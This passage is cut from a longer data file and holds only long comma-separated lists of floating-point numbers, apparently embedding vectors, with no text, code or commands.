5866,-0.008456121,-0.017556798,0.0025466504,-0.004722333,-0.00563791,-0.011270906,0.01634459,0.023600264,0.005742205,-0.011199734,-0.00535498,0.028170623,0.007780895,0.025540717,0.01844637,0.017724395,-0.027733952,-0.0063665723,0.010221275,-0.018437369,0.00532515,0.015039678,0.011504162,0.034064308,0.022861877,0.00791782,-0.013582669,0.00045911816,-0.007282807,-0.0007558673,0.008911822,-0.025246294,0.0051769107,0.0068943915,-0.00020083431,-0.0004981788,0.047944494,-0.009336874,0.005265023,-0.0036624374,-0.0033823727,-0.0260468,-0.0018077595,0.0016394684,-0.000070150934,-0.027253002,0.021350993,0.0034821848,0.0054393997,0.0093666455,-0.013116044,0.0018839366,-0.00807716,0.0024288497,0.0075632995,-0.014939735,-0.010556546,-0.0035995382,0.00937203,-0.011120347,0.009413273,-0.0083319,0.014285056,-0.029479869,0.009223033,-0.0038856796,-0.0016321124,-0.0026503585,-0.016426008,-0.009014917,-0.014931545,0.00008487966,0.005179024,-0.002140455,-0.021266052,0.00474294,0.0052616266,0.016742164,-0.020992339,0.0048912773,0.033313353,0.008946693,-0.017042538,0.002704252,0.03226887,-0.010022685,0.015302782,0.0032855375,-0.0136632,0.008972739,-0.009446434,-0.011828271,-0.009887162,0.019625662,-0.007757081,0.031167258,-0.008341003,0.027843622,-0.034543622,-0.04311923,0.005369043,0.012353298,0.012631938,-0.019567052,0.0033507794,-0.010437465,-0.0009144914,-0.012915044,0.0026567802,-0.013347724,0.012489828,-0.005775018,0.0017493584,-0.01249557,0.0032991657,0.0052416753,0.00035847412,-0.023021905,-0.027684228,-0.0076322844,-0.003827807,0.0027013249,-0.006805496,0.010270525,0.0028627152,0.0011293371,-0.02996131,0.011642689,0.015206053,-0.016673677,-0.014957389,0.011267199,-0.0031744577,-0.011221344,-0.014315731,0.000058140577,0.033462867,0.013256087,-0.00014355086,0.00829574,-0.02085953,0.002531769,-0.0010768367,-0.005614962,-0.0144786835,0.009873583,-0.011158989,0.004261965,0.0010611658,-0.004997352,-0.034286678,-0.0023052602,-0.022427242,-0.02032903,-0.024286252,-0.017403258,-0.0045109857,-0.0021282611,0.0066344864,-0.010912528,0.007869186,0.025692983,-0.0022702364,0.024407057,-0.0033114997,-0.008681399,0.0058333585,-0.004232503,-0.015770502,0.008056942,-0.00040958307,-0.0003163912,-0.0101700565,0.03082342,0.009998551,-0.0050043957,0.00078363786,-0.014682397,0.015416757,-0.005018116,0.028342636,-0.015869638,0.0007316907,-0.02493507,0.0003381002,-0.012061576,-0.0130608035,0.027594578,0.041257355,-0.07670158,0.0039282115,0.012929395,-0.009172574,0.000043333457,0.016452665,-0.0043872786,-0.035462346,-0.028934384,0.012917131,0.011390925,-0.008883602,-0.041662365,0.0015120339,0.006448188,-0.02750447,0.010764645,-0.0040689725,-0.0054582427,0.0033755384,0.002658168,-0.0046180915,-0.0012836902,-0.0191845,-0.0029570719,-0.0017470072,-0.021901242,0.0043859337,-0.0065122307,0.014125572,0.0040972275,0.015842127,-0.027776318,0.008993336,0.028695049,0.004053126,0.02341264,0.008176123,-0.018100753,-0.025020814,0.002828024,0.00055991946,-0.009616325,0.011324055,-0.022380894,-0.019470153,0.0043133604,0.0062900544,0.13127851,-0.007449174,0.007281618,-0.000235451,0.008096847,-0.011869954,0.019394219,0.02645668,-0.003235319,0.021643441,0.008587789,0.017680023,0.0132270465,0.036144905,-0.0011658359,-0.008900988,0.003571949,0.13975628,-0.008974023,0.032054573,-0.0058585964,-0.008216346,-0.008517444,0.015945693,0.006795074,-0.070552416,-0.014055768,-0.03047374,-0.008849299,0.020349247,-0.03035638,0.031390727,-0.007885974,0.004700312,-0.0124609275,0.0020316613,0.01702116,-0.0068199523,-0.018149087,0.00036799844,0.008686524,-0.00849783,-0.02181247,-0.015370948,-0.011231368,0.016227782,-0.03953744,-0.010581151,0.011003451,0.023998052,-0.0035767711,-0.011717129,0.023650324,0.0011311149,0.012940769,0.025314823,0.010133102,-0.0032578562,-0.02665469,0.0052906503,0.0058710114,0.01515308,-0.0073235948,0.019413909,0.018348513,-0.018047892,-0.012081403,0.0022617735,0.0014583197,0.027540458,0.037931107,0.00909996,-0.023953877,-0.014987721,0.04060941,0.0032731786,-0.020471722,0.010214402,0.021814352,-0.022552984,0.03768836,-0.0030816835,-0.005026224,-0.0103829745,0.014330641,-0.007118486,0.009495422,-0.008112785,0.040278703,-0.00009342362,-0.010798243,0.017134657,-0.009793703,0.01957868,0.015934285,0.009593622,0.0076026777,-0.00051432935,-0.0049515227,-0.016705945,-0.0033225717,0.0030359456,0.002576653,-0.007804276,0.004903232,0.02025894,-0.0025413062,-0.010365702,0.0034603947,0.0028939361,0.019187937,-0.016808955,0.005473661,0.018436354,-0.0027580669,-0.0052787205,-0.019948004,-0.014314528,-0.029850453,0.009226731,0.0053704754,-0.0027405461,0.00030846774,0.0029867832,-0.030711982,0.0052820407,0.014116865,0.00839994,-0.008167107,-0.0036481787,-0.009778934,-0.0058816,0.01037081,0.06275729,-0.0010231377,-0.0016056965,0.014507208,-0.024831887,-0.029795332,0.002092446,0.013294617,0.024070067,0.009855428,0.004998958,-0.0032675038,-0.015062649,0.020056158,0.0025287797],[0.009121913,0.019295843,-0.018764822,-0.016276563,0.012540818,-0.019042986,-0.0057848925,0.022581276,-0.015292217,-0.0061274096,-0.001079877,0.010064472,0.006865467,0.0067033055,-0.015439625,-0.01080091,0.0022557771,0.005005326,-0.01310048,-0.0069153258,0.002035322,0.000023262206,0.024227837,-0.014868098,0.006360118,0.005878055,0.010109653,-0.008794685,0.0125969155,0.011631025,-0.004533461,0.002505981,0.02165657,0.0076863593,0.027486028,-0.0074941334,-0.014423775,-0.016309932,0.0032309182,-0.0013800535,-0.014206639,0.0042718104,-0.0052592377,0.018357722,-0.007793518,0.0025333755,-0.0053095813,0.018373588,-0.005697907,0.0016445474,0.009535966,-0.0010783804,-0.022648523,0.015806224,0.0037852272,0.024500111,-0.0073197605,-0.022152957,0.007714702,-0.0000848038,-0.007422763,0.029645182,-0.008001069,-0.010614281,0.039910883,-0.020964209,0.0012211319,-0.005732389,-0.012608105,-0.030280275,0.0053978385,0.008500197,0.017872384,-0.00053681806,0.045708638,0.018181007,0.0035723788,-0.021505618,-0.019748379,0.018434439,-0.0012865688,-0.009316615,-0.004352461,0.0034374613,0.00065953465,0.008967015,-0.005388666,-0.005265896,-0.0044226954,-0.021720788,-0.011012369,-0.002407468,-0.00016991344,0.02273525,-0.02184526,0.015839675,0.008607308,-0.010711987,-0.00058791734,0.017876029,-0.025448563,-0.0001769423,-0.024145061,0.007624218,0.0068448633,-0.016801247,-0.0046715275,-0.0022265685,0.010051875,-0.008670223,-0.003434295,0.0039989967,-0.0030548899,0.004987714,-0.0041504567,-0.011241927,-0.0037335316,-0.00020132282,-0.024661021,-0.0028852369,0.0017394893,0.017712627,-0.002379606,-0.003866974,-0.027300669,-0.020807238,-0.008978653,0.007987828,0.0051647206,-0.001549481,-0.006903674,0.025975898,-0.004392193,-0.012046664,0.01777636,-0.0053987694,0.007400762,-0.007635137,-0.0012186927,-0.01130757,0.011854139,-0.0011738468,0.01575629,-0.0113040395,0.02320135,0.02848957,-0.0076981355,0.019708326,0.010500669,-0.00040052674,0.004793274,0.001595338,-0.020608243,-0.016655492,0.00020528218,0.026408711,0.007287632,-0.018899571,-0.027295759,-0.01287415,-0.008939874,0.014843059,0.018232511,-0.012071559,-0.024840696,-0.03556294,-0.009482257,-0.007948224,-0.00851705,0.0050203395,0.032861523,0.027884824,0.014921911,0.018851928,0.01352029,0.018378975,0.0041815112,-0.009608497,0.00079962413,-0.004628177,0.0033308761,0.002581554,0.013839469,0.009098994,-0.008951414,0.024521181,0.00069408905,-0.007375961,-0.019162375,-0.019872867,0.0145430565,-0.011434021,-0.0068847495,0.00515517,-0.0076654474,-0.029834442,-0.014988517,0.11321395,-0.015190273,0.0007093156,-0.0129492115,0.00532688,0.010878978,-0.011050761,-0.01328256,0.0016186567,-0.00382219,-0.013502787,0.01393225,-0.0071998877,0.026093494,-0.023024615,-0.0056600953,0.004874034,-0.014732576,-0.05291386,0.013979968,0.009955216,0.0064614373,0.0054837572,-0.0031757215,0.012181733,0.007968201,-0.023946123,-0.013593207,-0.015477369,-0.008142749,0.00042522216,-0.0031718921,-0.02482369,0.0044690934,0.013741956,-0.019302953,-0.032573346,0.00465873,-0.004783345,0.013139944,-0.009043499,-0.009665672,0.00074562524,0.0011096781,0.0015144153,0.02483442,0.03244032,-0.020463884,0.0018226237,0.032763354,-0.000017654726,-0.0027546831,0.01192746,0.016178882,-0.013174064,0.0060200514,0.018997302,-0.004049066,-0.006235689,0.012776326,0.00048685411,0.003200128,0.016196987,0.0367275,0.017607873,0.0004917012,0.019479917,0.030454207,-0.0014203398,0.0167006,-0.034475826,-0.010444478,-0.009345828,-0.01744739,0.0048580514,-0.0027519886,-0.013174603,0.003666257,-0.03002456,-0.0037632969,-0.0076731,-0.0028634295,-0.0030556929,5.648349e-7,0.0014482519,-0.008964237,-0.021193499,-0.009856971,0.006815076,-0.0055826535,0.010621532,0.02987347,-0.0060944953,-0.0035798394,0.0077615464,0.038065325,-0.0013377331,0.0013654914,-0.010239069,-0.009035394,0.01877634,0.012332286,-0.014851413,0.007573858,-0.015200863,0.018606102,-0.007938491,0.0010231754,-0.01696611,-0.008321836,0.043512374,-0.015328197,0.0056457794,-0.021770343,-0.017922143,-0.029490158,0.0038006713,0.002815733,0.0025948246,-0.0038246752,-0.007788101,-0.004969779,-0.0025128748,0.029593568,-0.024314372,0.022836104,-0.039950173,-0.009289968,0.0076374398,0.010726593,-0.000003330522,0.03329278,0.018117847,-0.019813059,0.0100747105,0.033074487,0.01552666,-0.017069377,0.0259944,-0.016806437,0.040709775,0.010174663,0.0068885735,-0.025169352,-0.007116679,-0.007936752,0.015379033,-0.0049937037,-0.017163893,0.0072469073,0.011876494,0.019316593,0.024911623,0.037225243,-0.02318717,-0.0017172626,-0.0057980553,-0.021864086,-0.007943639,-0.004363609,-0.017349236,-0.00070919207,-0.01820305,0.030116858,-0.010574662,-0.017532056,0.005607253,0.06949241,0.006398519,-0.008696359,0.00611292,-0.0022766832,-0.0011276512,0.031460512,0.013373254,0.0072599147,0.0016421796,-0.014583561,-0.010883967,0.0018677317,0.012303661,-0.0071102376,0.016506571,-0.029559955,-0.02248209,-0.020877237,-0.010814501,0.029757978,-0.012018706,0.014829087,0.016389625,-0.00643994,0.010192988,0.003528214,-0.006885269,0.0033603804,-0.016871816,-0.013114427,-0.013868894,0.0017015282,0.0064361854,-0.061682288,0.012872852,0.010084994,-0.0008337335,-0.012872606,-0.0011706803,0.015815232,0.014863365,-0.010311129,-0.02345195,0.000054941334,0.048939563,0.014350685,-0.008559468,-0.0011114246,0.021149466,0.006659902,0.023579324,-0.03270137,0.011716403,-0.0069274334,0.0031265784,-0.001297038,-0.026892902,0.048968583,0.025758052,0.010387264,0.025655406,-0.013073658,0.0011624418,-0.022468327,0.03207361,-0.0005932626,-0.011143159,0.0088135535,0.006155965,0.0110457,0.015555547,0.003523127,0.019597705,-0.022304354,0.018589957,-0.008028372,0.004155199,0.0042895377,0.010146921,-0.0219595,-0.011780705,0.0067519573,-0.0031940844,-0.013371721,-0.007828971,-0.0072830417,0.008867215,0.011126958,-0.006213503,0.0052178353,0.016435457,0.015123839,-0.0024396705,0.028900027,0.037990976,0.017434336,0.0205252,-0.0017835784,0.012440466,0.000563472,-0.0041180016,0.00086588465,-0.031951003,-0.0072772754,0.012832915,0.007933205,-0.0059718085,0.0021549985,0.02695594,-0.03156621,0.008242465,-0.0006367457,-0.005775018,0.019547192,-0.029074593,0.002266604,-0.023757266,-0.010666952,-0.009293703,0.034955945,0.013826253,0.0062987534,0.012109111,0.010347745,0.008212593,0.0011223103,-0.0053136484,0.00019999393,0.0074194423,-0.0022658953,0.020290364,0.011142689,-0.02146507,0.016722009,0.0009870401,-0.0144826695,-0.041658297,0.02879519,0.008801063,0.011681819,0.0394767,0.041217897,0.0017538342,0.006013573,0.008313826,0.040300056,0.005327467,-0.02537616,-0.0083138,-0.01280071,-0.004449581,0.014034848,0.0024414961,0.016806347,-0.0066153537,0.034526806,-0.023642084,-0.019797415,0.022241896,0.029860409,-0.007375061,0.011767367,-0.0009418905,-0.016898887,0.010530655,0.00991926,0.06835116,-0.017602945,-0.029173043,-0.0060653244,0.007928088,-0.006445905,-0.018575167,0.031974766,-0.0023419007,0.013108603,-0.012160575,0.024295302,0.008034981,0.016129665,-0.016452229,-0.005847312,0.009136174,0.00045613456,-0.0121678235,0.009608293,0.012616955,0.0030406842,0.0015326167,-0.0066090105,-0.022659222,0.007210238,0.012139901,-0.001737114,-0.04135688,-0.008675589,-0.02450228,-0.006447902,0.012345225,-0.009255952,-0.0015760061,0.012720621,0.017727895,-0.0043396857,-0.008094771,0.038510226,-0.0029621487,0.007950015,-0.0011724822,0.022647262,0.030061029,-0.010113117,0.013819572,0.010051371,-0.0029284519,-0.0015880968,0.00744301,0.009844727,0.0153599335,0.014240711,-0.021988114,-0.0029425414,0.017707055,0.008656745,-0.028043851,0.025375936,-0.02541119,0.0018146167,-0.018531896,-0.008171514,-0.010328608,-0.02348784,0.004400959,0.00022464134,-0.0020389217,-0.025000013,-0.0028461907,0.006437978,-0.009906475,-0.014347009,0.021598138,0.015579686,-0.01223401,0.01542103,0.0075350865,-0.010029844,0.0048787054,0.021027105,-0.0023008033,-0.017572572,0.015592396,0.00028733464,-0.009940666,-0.015462548,0.013225896,-0.024602301,0.0023024525,-0.008142234,0.010173103,0.0035610152,0.017456872,0.018919239,-0.0070639076,-0.033893947,-0.0028022083,0.024646038,-0.022002254,0.0055463263,0.0028609177,0.035070445,-0.010411359,-0.014722873,-0.01428244,-0.009760365,-0.0038242207,-0.02308113,0.023697652,-0.057674248,-0.0017901314,0.019953875,0.015115474,-0.0067494228,0.03427569,0.013666408,0.0005612847,-0.010700873,-0.0014820795,-0.008771494,-0.010977432,-0.0011472513,0.011080933,0.018469963,-0.000123809,-0.02754432,-0.014086154,-0.029576898,-0.025542479,-0.018799093,0.04257316,0.00888828,0.01092762,0.01010235,0.016879892,0.0063464744,-0.0021867696,0.0066470816,-0.03133248,0.0007351976,0.014705746,-0.03185123,0.0056208135,0.014404269,0.0009841083,-0.010653098,-0.029847383,-0.011245916,-0.007893497,-0.00023243978,-0.015956843,-0.014123888,0.009395068,-0.013289884,0.025852788,-0.008638713,0.023556843,0.0060398853,0.04242242,0.021981725,-0.00016968918,-0.007963199,0.008353415,-0.011202944,0.019148385,-0.006636426,0.036043007,0.011124484,0.0107277455,0.01800155,-0.0027352788,-0.007077892,-0.022922054,0.016308183,0.04223653,0.023411479,-0.0018604839,0.025381211,0.0043407828,0.029543243,0.000039265662,0.007758098,0.0051136077,0.0023509648,0.010153606,-0.0053210203,0.035641976,0.016337484,0.00033085534,-0.008661296,-0.016833495,0.001137104,0.027119342,0.022038883,0.0012554226,0.014839028,0.009711144,-0.0026053519,0.0068077724,0.0007511721,-0.0018549088,0.000660686,-0.024532942,-0.011564472,-0.024275498,0.005790975,-0.04783218,0.0044685435,0.015309329,0.00042707965,-0.010733662,-0.009339087,-0.018990783,0.0030169657,-0.019838221,-0.03445041,-0.020275488,0.0070429295,0.016777802,-0.03944787,-0.023926003,0.012371729,-0.007961725,-0.0076647424,0.016656814,-0.0152688725,-0.016736114,-0.006299391,-0.018089108,0.023589494,0.028319668,0.030103354,-0.0050161155,-0.01244039,-0.006576634,-0.00547709,0.0012949978,-0.012554504,-0.00104039,0.002378021,-0.01365823,-0.0024956418,-0.030983841,-0.016117444,-0.01824742,-0.00018268025,-0.042104613,-0.01550669,-0.009246391,0.014469937,0.0126387095,0.020439098,-0.022132965,0.022402668,0.019619966,-0.007655371,0.008110919,-0.015605047,-0.0005627053,0.029071126,0.039583046,-0.020501643,-0.025195612,-0.010966932,0.006958916,-0.018707762,0.018470865,0.016087882,-0.0025606528,-0.026271965,-0.016648399,-0.0020282296,-0.018684436,0.011701504,0.010474137,-0.03502877,0.027190508,-0.01174817,0.02159596,0.033064608,-0.0029378138,0.007995591,-0.005971883,0.026681509,-0.032010123,-0.011822129,0.019561438,-0.0047100307,-0.001140999,0.002495244,-0.056430038,-0.020596376,-0.016833428,0.007849739,-0.0028902215,0.03170218,-0.004022557,-0.002879334,-0.017921891,0.011144104,0.0008549709,0.007292377,-0.022043249,-0.016957186,0.013173828,0.0033844423,0.015643971,0.008350625,-0.01956879,0.030756474,-0.0041231965,0.003023506,0.009904609,0.013404345,0.016732922,0.00519224,0.015289602,0.011435076,-0.013002037,0.013635233,-0.011214329,0.010508173,0.023894187,0.012932419,0.00759356,-0.0023619914,-0.014641191,-0.026186273,-0.0037546935,0.0071462123,-0.025624558,0.008788412,-0.0018163375,0.001442765,0.0002571131,-0.010025881,0.018047022,-0.0010544086,0.0031557505,0.015125045,-0.009854767,-0.017086256,-0.02456841,0.015272221,0.0044209543,-0.0049666855,0.008217199,0.005749281,0.02388357,0.030868309,-0.012411528,-0.00744676,0.0070871185,0.013436149,0.0012646321,0.010223562,0.00031420973,-0.017812267,-0.020944063,0.0075822338,-0.03473144,-0.020203687,-0.008149842,0.0069336155,0.012148701,-0.015869493,0.009044322,-0.0065554646,0.0034983298,0.0333932,0.000506378,0.010604957,-0.021123935,0.022689885,-0.008359791,0.006251825,0.0076164776,0.00041950765,0.0057793316,0.00666983,-0.004395839,0.00036453517,0.0016025718,-0.0069768904,-0.023375114,0.0086072935,0.0033933728,0.032376707,0.0086478125,0.0009868355,0.020730607,0.0054050223,-0.001471077,0.01244465,-0.033818822,-0.0038676886,-0.011129015,0.0012320683,-0.014909615,-0.00975342,0.00089598587,0.019264724,-0.017205086,-0.006970196,-0.023150705,-0.04818574,0.022392722,-0.012478021,-0.0019368574,-0.0047419053,0.023905478,-0.0028531938,0.017288892,0.038748033,-0.0013390792,0.018726481,0.0039834087,0.009496444,0.004076587,0.016661867,-0.011135374,-0.038443618,-0.0014499774,0.019916907,0.0039615994,0.009998805,0.009216424,0.011712668,0.008572885,0.03623992,0.010766351,-0.0010949661,-0.008769441,-0.012239243,0.015138495,-0.007642562,0.023684952,-0.009199967,-0.0043671085,-0.01680599,-0.006977333,0.00017570803,0.008026208,-0.006377579,0.0075670374,-0.0103594195,-0.008011967,0.00604965,0.019658344,-0.010376173,-0.012331499,0.012807115,-0.014967049,0.00265657,-0.028965086,0.01568727,-0.003117903,-0.003870495,0.01900034,-0.016139382,0.025430227,-0.0023746972,0.025994593,0.02358757,0.00041802265,0.0016676636,-0.0029113598,0.03503326,0.016033454,-0.026493344,-0.016439315,0.017920312,0.030397642,-0.0065416866,-0.037233874,-0.012671152,-0.0062164227,0.0060361787,-0.011632419,-0.015143812,0.020018723,-0.009203585,0.003876547,-0.006413906,-0.0054709534,-0.023914319,0.025056574,-0.030152708,0.002025474,-0.026668286,-0.018315902,0.005164308,0.008738818,0.013404127,-0.02557788,-0.012286347,0.0022556474,-0.01158546,0.020685254,0.02005784,0.01967883,-0.0037805503,-0.0013102489,0.011822829,-0.0065761227,0.022934318,-0.011287266,-0.0032217172,0.05935374,0.0022429915,0.0009267287,-0.012623852,0.015654162,0.03278933,0.02621853,-0.0077456906,0.012796718,0.0028472338,0.016705552,0.022708122,-0.015144267,-0.01586942,0.01910033,0.020040479,0.039544247,-0.008110966,0.0010551205,0.038375434,-0.0020518273,0.023828954,0.006210535,0.010127204,0.012853932,-0.02138451,0.00344314,-0.0021777072,0.02279262,0.010332607,-0.014825263,-0.008359166,-0.0016211418,-0.008356622,-0.01703728,-0.03126675,0.000261987,-0.027697608,0.009532662,-0.022968754,0.004867746,0.006079569,-0.03167424,-0.0058586425,0.0017385398,0.0067656725,0.019864459,0.0016593902,0.007259234,-0.005742353,0.012886603,-0.008851705,0.010254892,-0.0006532867,-0.015934596,-0.008515913,0.020930832,0.009802708,-0.034704216,-0.014472463,0.011960987,-0.034025937,0.004012688,-0.017678816,-0.011216976,-0.0067078634,0.009454946,0.010594736,0.01453296,-0.007603528,0.054576766,-0.0015251703,-0.02860442,0.023831561,0.01577745,-0.005305605,0.013962437,0.013032289,0.04098401,-0.0071502603,-0.003054008,0.007933883,-0.022666,0.0051741027,0.018694066,-0.00906204,-0.005851895,-0.00031779337,-0.009665603,0.0021225526,0.007323276,-0.013402411,0.033810217,-0.014155264,0.025318244,0.0030990015,-0.018150155,0.003224044,0.018427396,0.008471935,0.013640854,-0.017876726,0.02329886,0.009088944,-0.044313006,0.004872472,-0.00865241,0.0049560145,0.00691707,0.017278938,-0.0006343228,-0.016188093,-0.0018272215,-0.019865276,0.003553293,0.019759618,-0.007175949,0.017609244,0.021397365,0.024243819,-0.0007260872,0.0050933124,-0.011339484,0.0020869467,0.012744098,-0.009633673,-0.0066477917,0.011246244,-0.0014926849,0.0137323495,0.012011792,-0.020755108,-0.0033085477,0.008669012,0.009595235,0.0011964517,-0.014701718,-0.0001958291,0.023488052,0.017774206,-0.013765629,-0.013664303,0.029244417,0.0029048086,0.0026879364,0.0030993621,0.020382263,-0.004320918,0.015842617,0.012740466,0.0010649782,-0.017028837,-0.0028291845,-0.025454449,-0.006622767,-0.009679593,0.005174872,-0.0025344742,-0.00081295805,-0.021348404,-0.0011233693,0.011344308,0.009197747,-0.008171034,0.011500559,0.023670005,0.0131790945,-0.010945734,-0.009486866,0.010486758,0.011437375,0.009621565,-0.0105799325,-0.010008281,0.0034726185,0.011070887,0.0124380225,0.009897613,-0.004662668,-0.010251496,-0.04100433,0.017808067,0.022784177,0.013567362,-0.025909709,0.011609235,-0.0011404571,-0.01409702,-0.028102992,0.0018052467,0.007210273,0.007642207,-0.010104621,-0.02207466,-0.0046247886,-0.0047486145,-0.01200213,0.08295944,0.010356435,0.011499523,-0.013855864,0.015160047,-0.021649534,0.014658436,0.0069482657,0.009815036,-0.021386562,-0.023032833,-0.025949942,-0.00559669,-0.022261888,0.00999599,-0.010264808,0.00087505253,0.018228885,0.010504151,0.0027117815,0.004123827,0.0034688965,0.01998336,0.008601656,0.001388607,0.0066097467,0.012122009,-0.02686944,0.019541278,-0.00016070987,-0.004247471,-0.0058732927,-0.0059860987,0.024077665,-0.0026732853,-0.0035731967,0.011389079,-0.01882823,-0.012180548,0.0137090795,-0.011445156,-0.029917523,0.027066154,0.014831386,0.026061904,-0.0043324484,-0.021109113,-0.009382016,-0.0030989079,-0.0054681045,-0.007914672,-0.00625272,-0.007543282,-0.00011689903,-0.036561143,0.028727716,0.00544859,0.027969468,0.010361152,-0.008012807,0.0033171137,0.017446943,0.0013249958,0.0071682283,-0.015913107,-0.007941815,-0.004360899,-0.010849732,0.026239293,0.0058346745,0.033225905,0.0002010147,0.00042302438,0.005081016,0.0062093725,0.010517578,0.013082115,-0.014258161,-0.02268426,-0.019580986,-0.012126666,0.004185715,0.028533012,0.009985605,-0.0049628895,0.008902143,0.01037948,0.008793948,0.049928132,-0.00046999787,0.024316264,-0.00945107,-0.0065018237,0.013610595,0.016994832,0.0202602,-0.013678048,0.0010680404,-0.028589772,0.0051178727,-0.0009672096,0.0063925106,0.014390902,-0.023935964,-0.00052353746,0.003700225,0.005326338,-0.026693579,0.014269222,0.0411239,0.0057239556,0.0040504835,0.0024430829,0.0083122095,0.0047855494,0.0022291606,0.011315105,-0.013600681,-0.014460873,0.020757582,0.014857719,0.01840372,-0.0033325837,-0.043612193,0.0069304463,0.1451003,0.008205171,-0.009405737,0.029821845,-0.0053746034,0.00097463315,-0.09339844,0.004260372,0.0034469217,-0.025930418,0.009541539,-0.012656683,-0.013959756,0.013415894,0.010529187,-0.0013632359,0.0003109021,-0.0105434675,0.0116922,-0.018381353,-0.002965236,0.004094871,-0.0022513533,-0.0014638345,-0.027282739,-0.0038149143,0.008671555,-0.015519659,-0.0013544593,-0.032312747,0.0050702197,0.010022534,0.009617801,-0.012866881,-0.013011394,0.016419625,0.017173536,0.0057257516,-0.0049660215,0.0043407106,0.0072471695,-0.011433147,-0.023709023,-0.03497281,-0.1427629,-0.00241071,-0.032562576,-0.045407876,0.014531936,-0.025501274,-0.0036464187,0.005357794,0.017318122,0.0040221447,0.004893742,0.032705545,-0.013683441,0.0009465429,-0.029129164,-0.011274228,-0.007187466,-0.0029108857,0.013686252,-0.016499128,0.0011104738,-0.012827358,-0.02794728,-0.014272125,-0.014840946,0.022987537,0.015481344,0.047889333,-0.009940919,-0.0047821803,-0.027980339,0.011960448,-0.015693907,0.00293886,-0.001748235,-0.024260165,-0.011121133,-0.0004097723,-0.011769792,0.013220767,-0.030691518,0.000116224895,-0.0023232014,-0.014161394,0.013446974,0.0006298174,0.014187757,0.02316968,0.02720946,-0.004156248,0.021989148,-0.00039192376,-0.011208032,0.0011007467,-0.014676723,-0.018716156,0.0022355074,-0.030824304,-0.007640594,0.01885188,-0.023554616,-0.0064760684,-0.0056859143,-0.018982785,0.028765667,0.0053646085,0.01859954,-0.034287058,0.0010422271,0.022193925,-0.015921619,0.003453355,-0.00917898,-0.022420598,0.013568826,0.02337157,-0.00068137265,-0.0072931284,0.002851155,-0.024679594,0.013199696,-0.013026319,-0.0030477862,-0.015826616,0.0064178724,-0.009787471,0.007060838,-0.00012079476,-0.006685795,-0.007448853,0.039008748,-0.0067450413,0.012283857,-0.005774746,0.010739782,0.015562093,0.044233743,-0.010531519,-0.026717018,0.00384863,-0.00012553784,-0.016176067,-0.018198226,0.00026687494,-0.0059421128,0.00624602,0.02185559,-0.02673532,-0.032466464,0.0057149534,0.01962137,-0.022927243,0.031102639,-0.007024543,-0.035151105,-0.025406595,0.016423797,0.00946353,0.023118902,0.0014391345,-0.03129669,0.017883455,0.002350702,0.0029124613,0.042496603,0.0068163304,-0.01962558,0.0022123163,-0.011591055,0.0024504876,-0.019786349,0.023198368,-0.00031700815,0.006449721,-0.015763622,-0.0073457006,0.0036451146,0.007779656,-0.020300724,-0.011600886,-0.0029794397,0.0057769716,0.009221272,-0.015594869,-0.0044917283,-0.012737239,0.035149105,-0.0063673956,0.038525693,0.002052552,0.0043914174,0.018292109,-0.016785873,-0.02432416,0.014275839,0.06453891,0.0021112512,-0.013122102,0.014628287,0.0010699342,0.018710459,0.0067070415,-0.02937025,0.00075265643,-0.019645803,-0.027994912,-0.0071027093,-0.012483287,0.020339185,-0.02903878,0.017407691,0.01419237,0.025606979,-0.004085549,-0.0033731537,0.020922167,-0.012588219,-0.0012886644,0.0154394545,-0.006999439,0.012935165,0.016587479,-0.0067389566,-0.009273986,0.009853543,-0.027750783,-0.01190324,-0.007295578,0.007939376,0.036675394,-0.034427438,-0.009293559,-0.003596253,-0.000014189192,-0.01130095,0.006567717,0.022172878,0.023149714,-0.019326573,-0.0018319653,-0.03286397,-0.029548531,0.009000944,-0.0068075242,-0.007474744,0.0019706858,0.015534791,0.0069222674,0.012651931,0.016265083,-0.0008922055,-0.005878734,-0.006761579,0.0042741885,-0.0071136034,0.017073613,-0.011118513,-0.008195464,-0.0034758411,-0.019674448,-0.004155625,-0.0046035964,-0.009851363,-0.0033509012,0.025516113,-0.0023397263,0.010394708,-0.005343136,0.014234725,0.00046116253,-0.008161808,-0.015298096,-0.007577805,-0.009917463,0.037228655,0.007402618,0.027178982,0.003511181,-0.002885815,-0.01006233,-0.028626872,-0.00040998613,0.032567818,-0.03175538,-0.0009340649,-0.00033543046,0.0013951914,-0.0066507487,-0.004664645,0.016511008,0.018676274,0.019718567,0.003671047,0.013226241,-0.009648002,0.011938225,0.009610273,0.01603608,-0.024220929,0.011978362,-0.011667566,-0.009182617,0.007026962,0.009641968,-0.019342463,0.016377363,-0.01823595,0.004513166,-0.011029453,-0.0191356,0.05213649,-0.0029485389,0.011451897,0.024218028,-0.0028616705,-0.003656085,-0.004185371,0.010691303,-0.011503185,0.016303966,0.002116871,0.0016696469,0.012074414,-0.042665236,-0.0069347774,-0.019389955,0.028189454,0.010840067,-0.002819225,-0.008374833,-0.009926697,0.011169662,0.025050182,-0.014757839,0.019409113,-0.022289235,-0.017953513,-0.011977366,0.0005008275,-0.015736459,0.0025846462,-0.003285903,-0.010676719,-0.02856368,0.0010963324,-0.013348544,0.020022834,-0.008749554,-0.0066099977,0.009647578,0.016646683,0.0013889638,-0.0048005497,-0.011698979,-0.006665793,0.0064107818,0.044623904,0.0013411581,0.000895929,-0.0291875,0.032675758,0.0320885,0.0013193128,0.010750189,0.0024610865,0.0041485373,-0.021543493,0.00033448075,0.0044646896,-0.014936348,-0.016904047,0.0142309945,0.0025978396,0.00074496877,-0.02372257,0.017208079,0.012444335,-0.009734964,0.006863751,-0.004804367,0.017514167,0.0019418234,0.038394805,-0.0012125783,0.0014223423,0.0003691071,-0.01266746,-0.014114459,0.007070303,-0.019678125,-0.00577822,0.022245225,-0.012770565,0.024791257,-0.004910176,0.0042983145,0.017598692,-0.018682046,0.004196196,0.008276071,-0.015842954,-0.016010448,-0.026857479,-0.0075623686,-0.016594963,-0.0061159027,-0.012284231,-0.021184862,0.007699203,-0.006581635,-0.0085651595,-0.00077323715,0.025873356,-0.0030794232,-0.015991196,0.007443537,-0.00593302,-0.013970289,0.000006800823,-0.0007345783,-0.0099942135,-0.015984809,0.054460473,-0.027023925,-0.019222522,-0.009496456,0.035388697,0.012699789,-0.02374936,0.0095820585,-0.023371708,-0.018347785,0.010060975,-0.029782062,0.00951883,-0.0007882769,-0.024548942,-0.0133278575,0.014555279,0.004616866,0.007518926,0.004408132,0.018314218,-0.010238441,0.037738666,0.0012852754,-0.028819038,-0.06005205,-0.027199686,0.009861238,-0.0068867253,0.03322948,0.011469247,-0.020907216,-0.0414686,0.0038498386,-0.028099384,0.0030023488,0.00047320302,-0.007502833,0.0125143435,0.0062047876,0.019258695,-0.0000655488,-